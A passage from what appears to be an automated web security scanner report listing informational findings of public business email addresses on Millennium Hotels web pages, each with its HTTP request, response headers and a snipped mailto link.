The following email address was disclosed in the response:

reservations.Knightsbridge@millenniumhotels.co.uk

Request

GET /millenniumknightsbridge/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.328. http://www.millenniumhotels.co.uk/millenniummayfair/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniummayfair/index.html

Issue detail

The following email address was disclosed in the response:

reservations.mayfair@millenniumhotels.co.uk

Request

GET /millenniummayfair/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.329. http://www.millenniumhotels.co.uk/millenniumreading/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumreading/index.html

Issue detail

The following email address was disclosed in the response:

reservations.reading@millenniumhotels.co.uk

Request

GET /millenniumreading/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:56:37 GMT
ETag: "28cc9-cf1e-80cd6828"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations.reading@millenniumhotels.co.uk" target="_self"
href="mailto:reservations.reading@millenniumhotels.co.uk">
...[SNIP]...

21.330. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/copthornehoteldubai/index.html

Issue detail

The following email address was disclosed in the response:

hotel@cop-dubai.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:49:15 GMT
ETag: "14693-d881-1395ddb5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="hotel@cop-dubai.com" target="_self" href="mailto:hotel@cop-dubai.com">
...[SNIP]...

21.331. http://www.millenniumhotels.com/ae/goldmohurhoteladen/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/goldmohurhoteladen/index.html

Issue detail

The following email address was disclosed in the response:

webmaster@millenniumhotels.com

Request

GET /ae/goldmohurhoteladen/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:12 GMT
ETag: "34824-e1d0-3fda69da"
Accept-Ranges: bytes
Content-Length: 57808
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 16:02:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<m
...[SNIP]...
<a href="mailto:webmaster@millenniumhotels.com">webmaster@millenniumhotels.com</a>
...[SNIP]...

21.332. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/grandmillenniumalwahda/index.html

Issue detail

The following email addresses were disclosed in the response:

sales.alwahda@mill-cop.ae
sales@grandmill-alwahda.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:48:45 GMT
ETag: "222fd-c8a0-11d711d3"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a target="_self" href="mailto:sales.alwahda@mill-cop.ae">sales@grandmill-alwahda.com</a>
...[SNIP]...

21.333. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/grandmillenniumdubai/index.html

Issue detail

The following email address was disclosed in the response:

sales@grandmill-dubai.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:55:13 GMT
ETag: "1cc58-c7b5-7bc5783e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:sales@grandmill-dubai.com" target="_self">
...[SNIP]...

21.334. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/kingsgateabudhabi/index.html

Issue detail

The following email address was disclosed in the response:

sales@kg-abudhabi.ae

Request

Response

21.335. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/millenniumabudhabi/index.html

Issue detail

The following email address was disclosed in the response:

sales@mill-abudhabi.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:54:24 GMT
ETag: "22448-ca4b-78de51a9"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:sales@mill-abudhabi.com" target="_self" title="sales@mill-abudhabi.com">
...[SNIP]...

21.336. http://www.millenniumhotels.com/ae/millenniumdubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/millenniumdubai/index.html

Issue detail

The following email address was disclosed in the response:

sales@mill-airportdubai.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:54:02 GMT
ETag: "206cd-caae-7791f6a7"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales@mill-airportdubai.com" target="_self"
href="mailto:sales@mill-airportdubai.com">
...[SNIP]...

21.337. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/copthorneqingdao/index.html

Issue detail

The following email addresses were disclosed in the response:

info@copthornehotelqingdao.com
info@copthorneqingdao.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:15:14 GMT
ETag: "33527-e3ef-471d1fee"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="info@copthorneqingdao.com" target="_self"
href="mailto:info@copthornehotelqingdao.com">
...[SNIP]...

21.338. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/grandmillenniumbeijing/index.html

Issue detail

The following email addresses were disclosed in the response:

sales@grandmillenniumbeijing.com
sales@millenniumhotels.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:15:09 GMT
ETag: "29528-e4f9-46c9338e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales@grandmillenniumbeijing.com" target="_self"
href="mailto:sales@grandmillenniumbeijing.com">
...[SNIP]...
<a href="mailto:sales@millenniumhotels.com">sales@grandmillenniumbeijing.com</a>
...[SNIP]...

21.339. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumchengdu/index.html

Issue detail

The following email address was disclosed in the response:

reservations@millenniumchengdu.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:14:13 GMT
ETag: "2a8d9-e46f-43770030"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations@millenniumchengdu.com" target="_self"
title="reservations@millenniumchengdu.com">
...[SNIP]...

21.340. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumshanghai/index.html

Issue detail

The following email address was disclosed in the response:

sales@millenniumhongqiao.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:14:11 GMT
ETag: "2a9ca-e763-962f8871"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales@millenniumhongqiao.com" target="_self"
href="mailto:sales@millenniumhongqiao.com">
...[SNIP]...

21.341. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumwuxi/index.html

Issue detail

The following email address was disclosed in the response:

reservations@millenniumwuxi.com

Request

Response

21.342. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumxiamen/index.html

Issue detail

The following email address was disclosed in the response:

reservation@millenniumxiamen.com

Request

Response

21.343. http://www.millenniumhotels.com/corporate/hotels/kingsgateHotels.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/hotels/kingsgateHotels.htm

Issue detail

The following email address was disclosed in the response:

webmaster@millenniumhotels.com

Request

GET /corporate/hotels/kingsgateHotels.htm HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:12 GMT
ETag: "34824-e1d0-3fda69da"
Accept-Ranges: bytes
Content-Length: 57808
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 16:01:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<m
...[SNIP]...
<a href="mailto:webmaster@millenniumhotels.com">webmaster@millenniumhotels.com</a>
...[SNIP]...

21.344. http://www.millenniumhotels.com/corporate/legalInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/legalInfo.html

Issue detail

The following email address was disclosed in the response:

enquiries@millenniumhotels.co.uk

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:37 GMT
ETag: "2fb79-ecdd-9428f8fa"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href="mailto:enquiries@millenniumhotels.co.uk">enquiries@millenniumhotels.co.uk</a>
...[SNIP]...

21.345. http://www.millenniumhotels.com/corporate/privacyPolicy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/privacyPolicy.html

Issue detail

The following email address was disclosed in the response:

privacy@mill-usa.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:32 GMT
ETag: "2cd8b-113e7-93e35ab6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href="mailto:privacy@mill-usa.com">privacy@mill-usa.com</a>
...[SNIP]...

21.346. http://www.millenniumhotels.com/corporate/termsConditions.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/termsConditions.html

Issue detail

The following email address was disclosed in the response:

info@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:32 GMT
ETag: "32406-1122d-93e0f85c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
apply to Contracts for all Millennium Hotels and Copthorne Hotels.
For terms and conditions for Hotels in any particular jurisdiction, or for a sample contract,
please communicate directly with us at info@mhrmail.com or with the Sales and Marketing Department
of any Millennium Hotel or Copthorne Hotel.</p>
...[SNIP]...

21.347. http://www.millenniumhotels.com/de/copthornehannover/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/de/copthornehannover/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.hannover@millenniumhotels.de

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:53:47 GMT
ETag: "23932-cc02-76a1e040"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="copthorne.hannover@millenniumhotels.de" target="_self"
href="mailto:copthorne.hannover@millenniumhotels.de">
...[SNIP]...

21.348. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/de/millenniumstuttgart/index.html

Issue detail

The following email address was disclosed in the response:

sales.stuttgart@mill-cop.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:45:59 GMT
ETag: "22475-cb7b-7ee88cc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:sales.stuttgart@mill-cop.com" target="_self"
title="sales.stuttgart@mill-cop.com">
...[SNIP]...

21.349. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/fr/millenniumcharlesdegaulle/index.html

Issue detail

The following email addresses were disclosed in the response:

Reservations.CDG@millenniumhotels.fr
resa.cdg@mill-cop.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:44:42 GMT
ETag: "224a5-cdb2-35299cf"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="resa.cdg@mill-cop.com" target="_self"
href="mailto:Reservations.CDG@millenniumhotels.fr">
...[SNIP]...

21.350. http://www.millenniumhotels.com/fr/millenniumparis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/fr/millenniumparis/index.html

Issue detail

The following email addresses were disclosed in the response:

opera@mill-cop.com
opera@millenniumhotels.fr

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:50:44 GMT
ETag: "1f3db-cca2-6bb9fe92"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:opera@millenniumhotels.fr" target="_self" title="opera@mill-cop.com">
...[SNIP]...

21.351. http://www.millenniumhotels.com/id/millenniumjakarta/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/id/millenniumjakarta/index.html

Issue detail

The following email address was disclosed in the response:

sales@millenniumjkt.com

Request

Response

21.352. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/kw/aljahrahcopthornekuwait/index.html

Issue detail

The following email address was disclosed in the response:

admin@cop-aljahra.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:43:16 GMT
ETag: "21017-c821-fe36a2f1"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:admin@cop-aljahra.com">admin@cop-aljahra.com</a>
...[SNIP]...

21.353. http://www.millenniumhotels.com/millenniumanchorage/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumanchorage/index.html

Issue detail

The following email address was disclosed in the response:

anchorage@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:06 GMT
ETag: "3312f-fcd4-3f800d87"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:anchorage@mhrmail.com" target="_self" title="anchorage@mhrmail.com">
...[SNIP]...

21.354. http://www.millenniumhotels.com/millenniumboston/attractions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "339ae-1019a-922a84b5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.355. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/Green_Policy.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:03 GMT
ETag: "2d000-ee69-3f4472bd"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.356. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/Logan_International_Airport.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:03 GMT
ETag: "339c7-eb6b-3f43bba2"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.357. http://www.millenniumhotels.com/millenniumboston/attractions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/attractions/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "339ae-1019a-922a84b5"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.358. http://www.millenniumhotels.com/millenniumboston/contactus/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/contactus/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:02 GMT
ETag: "2d004-e211-3f3d4baf"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...
<a href="mailto:bostonian@mhrmail.com">bostonian@mhrmail.com</a>
...[SNIP]...

21.359. http://www.millenniumhotels.com/millenniumboston/facilities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/facilities/

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:02 GMT
ETag: "2d067-e533-3f3a6f43"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.360. http://www.millenniumhotels.com/millenniumboston/facilities/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/facilities/index.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:03 GMT
ETag: "34921-e533-922451cb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:bostonian@mhrmail.com" target="_self" title="bostonian@mhrmail.com">
...[SNIP]...

21.361. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/forms/optInForm.html

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:00 GMT
ETag: "34928-e0d3-3f22d4c8"
